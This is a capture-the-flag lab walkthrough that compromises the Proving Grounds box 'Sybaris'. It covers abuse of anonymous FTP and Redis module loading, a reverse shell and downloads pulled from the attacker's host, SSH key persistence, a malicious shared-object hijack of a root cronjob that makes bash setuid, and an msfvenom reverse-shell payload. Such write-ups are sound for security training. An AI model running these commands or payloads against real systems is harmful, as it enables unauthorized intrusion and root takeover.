Sybaris
Exploitation Guide for Sybaris | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for Sybaris | Proving Grounds
Last updated
Was this helpful?
In this walkthrough we will exploit common misconfiguration of ftp and redis to get initial foothold. Then we will exploit cronjob which is running as root with the help of writable ld_library_path .
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nmap -p- -vv -Pn -oN nmapFullPort.txt 192.168.91.93
Nmap scan report for 192.168.91.93
Host is up, received user-set (0.25s latency).
Scanned at 2021-09-06 00:21:44 EDT for 867s
Not shown: 65519 filtered ports
Reason: 65519 no-responses
PORT STATE SERVICE REASON
20/tcp closed ftp-data conn-refused
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp closed domain conn-refused
80/tcp open http syn-ack
6379/tcp open redis syn-ack
10091/tcp closed unknown conn-refused
10092/tcp closed unknown conn-refused
10093/tcp closed unknown conn-refused
10094/tcp closed unknown conn-refused
10095/tcp closed unknown conn-refused
10096/tcp closed unknown conn-refused
10097/tcp closed unknown conn-refused
10098/tcp closed unknown conn-refused
10099/tcp closed unknown conn-refused
10100/tcp closed itap-ddtp conn-refused
Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Sep 6 00:36:11 2021 -- 1 IP address (1 host up) scanned in 867.42 seconds
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nmap $ip -p20,21,22,53,80,6379 -sVC --version-all 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 03:43 EDT
Stats: 0:06:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 03:51 (0:02:09 remaining)
Nmap scan report for 192.168.91.93
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 23 Sep 06 06:43 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.91
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 21:94:de:d3:69:64:a8:4d:a8:f0:b5:0a:ea:bd:02:ad (RSA)
| 256 67:42:45:19:8b:f5:f9:a5:a4:cf:fb:87:48:a2:66:d0 (ECDSA)
|_ 256 f3:e2:29:a3:41:1e:76:1e:b1:b7:46:dc:0b:b9:91:77 (ED25519)
53/tcp closed domain
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: HTMLy v2.7.5
| http-robots.txt: 11 disallowed entries
| /config/ /system/ /themes/ /vendor/ /cache/
| /changelog.txt /composer.json /composer.lock /composer.phar /search/
|_/admin/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.22
|_http-title: Sybaris - Just another HTMLy blog
6379/tcp open redis?
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 557.82 secondsAnonymous login is allowed so. Check if we can find anything. Unfortunately ftp has nothing.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ ftp 192.168.91.93 21 130 ⨯
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (192,168,91,93,39,107).
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 23 Sep 06 06:43 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (192,168,91,93,39,112).
150 Here comes the directory listing.
226 Directory send OK.No authrorization is needed but the database is empty so we can't do anything.
We get the version at least 5.0.9
# Dirsearch started Mon Sep 6 00:23:34 2021 as: dirsearch.py -u 192.168.91.93 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50 -o /home/kali/oscp/boxes/pg/sybaris/scans/dirsearch.txt
200 2KB http://192.168.91.93:80/COPYRIGHT.txt
200 18KB http://192.168.91.93:80/LICENSE.txt
200 8KB http://192.168.91.93:80/README.md
302 0B http://192.168.91.93:80/admin -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin%20/ -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/ -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/?/login -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/backup/ -> REDIRECTS TO: /login
301 235B http://192.168.91.93:80/cache -> REDIRECTS TO: http://192.168.91.93/cache/
200 9KB http://192.168.91.93:80/composer.lock
200 507B http://192.168.91.93:80/composer.json
301 237B http://192.168.91.93:80/content -> REDIRECTS TO: http://192.168.91.93/content/
200 1KB http://192.168.91.93:80/favicon.ico
200 1KB http://192.168.91.93:80/humans.txt
200 8KB http://192.168.91.93:80/index
301 234B http://192.168.91.93:80/lang -> REDIRECTS TO: http://192.168.91.93/lang/
200 3KB http://192.168.91.93:80/login
200 3KB http://192.168.91.93:80/login/
302 0B http://192.168.91.93:80/logout -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/logout/ -> REDIRECTS TO: /login
200 1KB http://192.168.91.93:80/robots.txt
200 505B http://192.168.91.93:80/sitemap.xml
301 236B http://192.168.91.93:80/system -> REDIRECTS TO: http://192.168.91.93/system/
301 236B http://192.168.91.93:80/themes -> REDIRECTS TO: http://192.168.91.93/themes/
302 0B http://192.168.91.93:80/upload.php -> REDIRECTS TO: /login/# Disallow directories
Disallow: /config/
Disallow: /system/
Disallow: /themes/
Disallow: /vendor/
Disallow: /cache/
# Disallow files
Disallow: /changelog.txt
Disallow: /composer.json
Disallow: /composer.lock
Disallow: /composer.phar
# Disallow paths
Disallow: /search/
Disallow: /admin/
# Allow themes
Allow: /themes/*/css/
Allow: /themes/*/images/
Allow: /themes/*/img/
Allow: /themes/*/js/
Allow: /themes/*/fonts/
# Allow content images
Allow: /content/images/*.jpg
Allow: /content/images/*.png
Allow: /content/images/*.gif
We get nowhere through web. We can try bruteforcing login panel other than that I couldn't get any attack vector.
We will exploit Redis Execute Module to get the initial foothold. We need to create a module and upload it to target machine and then be able to call that module through redis.
Since we have anonymous access to ftp, we will upload it there.
Get the module and compile it from here:
┌──(imtodess㉿deathnote)-[~/…/pg/sybaris/exploit/RedisModules-ExecuteCommand]
└─$ ftp 192.168.91.93 21
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
553 Could not create file.
ftp> cd pub
250 Directory successfully changed.
ftp> put module.so
local: module.so remote: module.so
227 Entering Passive Mode (192,168,91,93,39,110).
150 Ok to send data.
226 Transfer complete.
47872 bytes sent in 0.25 secs (183.4254 kB/s)
ftp> exit
221 Goodbye. Now load the module through redis.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ redis-cli -h 192.168.91.93
192.168.91.93:6379> module load /var/ftp/pub/module.so
OK
192.168.91.93:6379> system.exec "id"
"uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\n"we know the module location because default directory of user anonymous on
VSFTPDis/var/ftp.
Source:
We now have command execution. It also has built in reverse shell. So Start a netcat listener and execute the following command.
192.168.91.93:6379> system.rev 192.168.49.91 80We will receive shell with privileges of user pablo.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nc -nvlp 80 1 ⨯
listening on [any] 80 ...
connect to [192.168.49.91] from (UNKNOWN) [192.168.91.93] 57946
whoami
pablo
cd pablo
ls
local.txt
cat local.txt
38f4<Redacted>dc952
Before we try to escalate our privilege. Lets set up a different way to access the target machine in case we get disconnected and have to run the exploit again.
Since SSH is running on the machine. We will just put our public key as authorized_keys in .ssh directory. Then we can login through ssh with our private key.
Make directory .ssh and Download public key to target machine.
mkdir .ssh
cd .ssh
wget http://192.168.49.91:6379/id_rsa.pub
--2021-09-06 02:30:14-- http://192.168.49.91:6379/id_rsa.pub
Connecting to 192.168.49.91:6379... connected.
HTTP request sent, awaiting response... 200 OK
Length: 572 [application/vnd.exstream-package]
Saving to: 'id_rsa.pub'
0K 100% 21.2M=0s
2021-09-06 02:30:15 (21.2 MB/s) - 'id_rsa.pub' saved [572/572]
ls
id_rsa.pub Rename it to authorized_keys
mv id_rsa.pub authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDvuCCwSCoKto+966iR2xMXgk6qN6kQaoH02l2v3R+FKVR/bQkRHVFvMgOiYkYsLtYIOSMeUz0io+BzIFcLG8n9jh0akOf4c8e/H/feSf1f19ZKuk42pkI04Ob9BmVyv9Xs
4s7xYEPuVYX+hh9V5vKwqwbpTYc5W/UGXsP5HN/krHZY4xoTTdvwoOaC7oDgXajf9bC6HGgULoIgbDavcZvcnPY0xU9BTQRoHDxcchgXGS6ENxYuMycdLUcMCVXrWDiiw4IR3XWzrR2OYFWfE6EJ2PLE5EW2H4L7k9l51X+G
RzCaAGTMkI2Oyjh6HyIL/+Um+qUSjy8OkJVIIUy7k0MjSOe6C3Bg1vmvWgDVcddFNYK+pXWZnsgvf/6aNmtaj1565m8seCvTG5+2Qr1HMdrX6ps5B9StWMYrxMIRt9C5YHXC4NwDuvVn2ehMMH1Pre4ohUQkv7oIm82rMOsN
7f4O7rw2HzHDkS3unwl6lU/w7Srp60scLcJVEofAllwMlos= imtodess@deathnote
Now we can login with ssh.
┌──(imtodess㉿deathnote)-[~/…/pg/sybaris/exploit/RedisModules-ExecuteCommand]
└─$ ssh -i ~/.ssh/id_rsa pablo@192.168.91.93 255 ⨯
The authenticity of host '192.168.91.93 (192.168.91.93)' can't be established.
ECDSA key fingerprint is SHA256:qzsl2Px3mLCH63nX2cvCIQxE3QbBAZqvIEnarFYfyho.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.91.93' (ECDSA) to the list of known hosts.
[pablo@sybaris ~]$ ls
local.txt
[pablo@sybaris ~]$ which python
/usr/bin/python Download linpeas on target machine.
[pablo@sybaris ~]$ cd /tmp
[pablo@sybaris tmp]$ wget http://192.168.49.91:6379/linpeas.sh
--2021-09-06 02:34:19-- http://192.168.49.91:6379/linpeas.sh
Connecting to 192.168.49.91:6379... connected.
HTTP request sent, awaiting response... 200 OK
Length: 454923 (444K) [text/x-sh]
Saving to: ‘linpeas.sh’
100%[========================================>] 454,923 339KB/s in 1.3s
2021-09-06 02:34:20 (339 KB/s) - ‘linpeas.sh’ saved [454923/454923] Make it Executable and run.
[pablo@sybaris tmp]$ chmod +x linpeas.sh
[pablo@sybaris tmp]$ ./linpeas.sh
. . .
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
* * * * * root /usr/bin/log-sweeper
. . .
From above result. It seems like a cronjob is running in a system with a privilege of root. And LD_Library_path has extra directories as well. One of them is writable /usr/local/lib/dev.
Since we can write on one of the directory. We should be able to inject malicious shared object to exploit the cronjob.
First list the shared object of /usr/bin/log-sweeper.
[pablo@sybaris tmp]$ ldd /usr/bin/log-sweeper
linux-vdso.so.1 => (0x00007ffc029ca000)
utils.so => not found
libc.so.6 => /lib64/libc.so.6 (0x00007f99d0518000)
/lib64/ld-linux-x86-64.so.2 (0x00007f99d08e6000)Shared object named utils.so is not found. So we will create our malicious shared object with its name and add it to library path.
Compile the following c code as follows:
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack(){
setresuid(0,0,0);
system("chmod +s /bin/bash");
}
// compile this exploit with following command
// gcc -o utils.so -shared -fPIC exploit.c Then upload the compiled shared object to target machine through ftp.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/exploit]
└─$ ftp 192.168.91.93 21
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> cd pub
250 Directory successfully changed.
ftp> put utils.so
local: utils.so remote: utils.so
227 Entering Passive Mode (192,168,91,93,39,116).
150 Ok to send data.
226 Transfer complete.
16040 bytes sent in 0.00 secs (188.8511 MB/s)
ftp> ^C
ftp> exitMove the shared object to writable path. And wait for cronjob to run.
[pablo@sybaris tmp]$ mv /var/ftp/pub/utils.so /usr/local/lib/dev/After some time, The permission of /bin/bash will change. We can then just run bash -p to get root privilege.
[pablo@sybaris tmp]$ ls -la /bin/bash
-rwsr-sr-x. 1 root root 964536 Mar 31 2020 /bin/bash
[pablo@sybaris tmp]$ bash -p
bash-4.2# id
uid=1000(pablo) gid=1000(pablo) euid=0(root) egid=0(root) groups=0(root),1000(pablo)
bash-4.2# whoami
root
bash-4.2# cd /root
bash-4.2# ls
proof.txt
bash-4.2# cat proof.txt
ba233<redacted>02ab20bIf you prefer reverse shell, then create malicious shared object using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.91.49 LPORT=6379Other step is Same as above. Just remember to start a netcat listener.
